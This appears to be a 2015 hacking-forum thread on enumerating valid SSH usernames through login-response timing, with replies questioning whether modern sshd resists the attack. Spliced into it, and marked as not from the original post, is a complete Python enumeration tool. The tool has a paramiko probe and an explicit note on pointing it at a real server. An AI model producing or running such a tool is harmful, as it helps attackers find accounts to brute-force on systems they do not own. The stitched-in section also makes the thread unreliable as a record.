Author Topic: SSH username finder.

hack3rcon
SSH username finder.
« on: September 14, 2015, 08:41:53 am »
Hello.
How can I find the list of username on a host for SSH login?

Thank you.

hcac
Re: SSH username finder.
« Reply #1 on: September 14, 2015, 09:32:50 am »
Edit: xor, that was awesome, thanks.

[Post cleared!]
« Last Edit: September 15, 2015, 07:06:25 am by hcac »

xor
Re: SSH username finder.
« Reply #2 on: September 15, 2015, 04:59:45 am »
Some implementations of SSH are subject to timing-based attacks which can help you enumerate usernames.
Here's an example of what happens.


1. You establish a connection with the server.
2. You send the username and password.
3. The server checks if the username exists, if it doesn't it sends an authentication failed message.
4. If the username does exist, it hashes your password and checks it against the one stored locally.


Step 4 is what you will be attacking. A few server implementations will only perform expensive hash generation if they have determined that there is a username to check against.

This means, if a user doesn't exist, the server will reply really quickly.
If the user does exist, it will take the server a little longer to reply.

You can enhance the effect of this attack by sending HUGE passwords, as many characters as you can throw at it (thousands or more).
This will slow the server down when it's validating the password, because it has to hash it in chunks and is computationally expensive, slowing the response down.


TL;DR.

Server only checks the user's password if the user exists.
Sending a really long password will slow down the CPU and take longer to reply.
If a user doesn't exist the server replies quickly.
If a user does exist, the server will hash the password and check it; using a really long password will slow this process down and let you determine if a username is legitimate or not.


References:

http://www.behindthefirewalls.com/2014/07/openssh-user-enumeration-time-based.html
http://www.devconsole.info/?p=341
http://pentestmonkey.net/tools/timing-attack-checker
http://www.devconsole.info/?p=493


Hopefully this helps.

-- xor
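As an added worked example (not code from xor's post or from the tools linked above), here is the measurement side of the attack in Python: repeat each attempt and take the median so one slow packet does not mislead you, build a baseline from random usernames that cannot exist, and flag candidates whose median is well above that baseline, using the long-password amplification the post describes. The target here is a constructed simulation of the behaviour in steps 1 to 4, so the block runs offline; `make_paramiko_probe` is the swap-in for a real host and assumes the third-party paramiko library is installed (it is imported inside that function so the rest runs without it). `Probe`, `LONG_PASSWORD`, `SIM_USERS`, `make_simulated_probe` and `make_paramiko_probe` are names invented for this example.

```python
import random
import statistics
import string
import time
from typing import Callable, Dict, Iterable, Optional

# A probe takes (username, password) and returns how many seconds the server
# took to answer that authentication attempt.
Probe = Callable[[str, str], float]

# The post's amplifier: a very long password makes the hashing step, which is
# only taken for existing users, measurably slower.
LONG_PASSWORD = "A" * 20000


def median_latency(probe: Probe, username: str, password: str, trials: int) -> float:
    """Median over several attempts; the median discards a single slow outlier
    caused by network jitter, which a single sample would not."""
    return statistics.median(probe(username, password) for _ in range(trials))


def baseline_latency(probe: Probe, password: str, trials: int,
                     rng: Optional[random.Random] = None, samples: int = 5) -> float:
    """Latency for users that almost certainly do not exist (random 16-letter
    names). Returns the slowest median seen, so the threshold is conservative."""
    rng = rng or random.Random()
    medians = []
    for _ in range(samples):
        name = "".join(rng.choice(string.ascii_lowercase) for _ in range(16))
        medians.append(median_latency(probe, name, password, trials))
    return max(medians)


def enumerate_users(probe: Probe, candidates: Iterable[str], password: str = LONG_PASSWORD,
                    trials: int = 5, ratio: float = 2.0,
                    rng: Optional[random.Random] = None) -> Dict[str, bool]:
    """True for each candidate whose median response time exceeds `ratio` times
    the slowest nonexistent-user baseline; False otherwise."""
    threshold = ratio * baseline_latency(probe, password, trials, rng)
    return {user: median_latency(probe, user, password, trials) > threshold
            for user in candidates}


# --- Constructed stand-in target (not a real server) -------------------------
# Models what the post describes: unknown users are rejected at once, known
# users pay a hashing cost that grows with password length. Assumed numbers.
SIM_USERS = {"root", "git", "backup"}


def make_simulated_probe(seed: int = 1) -> Probe:
    rng = random.Random(seed)

    def probe(username: str, password: str) -> float:
        latency = 0.020 + rng.uniform(0.0, 0.010)   # round trip plus jitter, seconds
        if username in SIM_USERS:
            latency += len(password) * 5e-6          # assumed per-byte hashing cost
        return latency
    return probe


# --- Real target: assumes the third-party paramiko library is installed -----
def make_paramiko_probe(host: str, port: int = 22) -> Probe:
    import paramiko

    def probe(username: str, password: str) -> float:
        transport = paramiko.Transport((host, port))
        transport.connect()                         # key exchange only, no host key check
        start = time.perf_counter()
        try:
            transport.auth_password(username, password)
        except paramiko.SSHException:
            pass                                    # a rejected login is the expected outcome
        finally:
            elapsed = time.perf_counter() - start   # time the auth reply only
            transport.close()
        return elapsed
    return probe


if __name__ == "__main__":
    # Offline run against the simulated target; swap in make_paramiko_probe(host)
    # to measure a real server.
    result = enumerate_users(make_simulated_probe(), ["root", "nobody", "git", "alice", "backup"])
    for user, exists in result.items():
        print(f"{user:8s} {'exists' if exists else 'unknown'}")
```

The threshold is derived from the target itself rather than hard-coded, because on a real network the absolute numbers depend on the round trip and the server's hashing cost; only the ratio between unknown and known users carries the signal. Two caveats a practitioner would add: if the server caps the length of the password it is willing to hash, or rate-limits failed logins, the amplification shrinks and more trials per candidate are needed before the medians separate.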

proxx (Global Moderator)
Re: SSH username finder.
« Reply #3 on: September 15, 2015, 09:39:07 am »
Quote from: xor on September 15, 2015, 04:59:45 am (Reply #2, quoted in full)

IIRC there is timing randomization in place to prevent such attacks?
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage

xor
Re: SSH username finder.
« Reply #4 on: September 15, 2015, 09:45:58 am »
Not on all implementations. It's easy to find out by trying.

proxx (Global Moderator)
Re: SSH username finder.
« Reply #5 on: September 15, 2015, 10:31:44 am »
Quote from xor: Not on all implementations. It's easy to find out by trying.
This would be interesting to test out on embedded boxes, but I seriously doubt this has any luck on any modern equipped box with a distro-packaged sshd.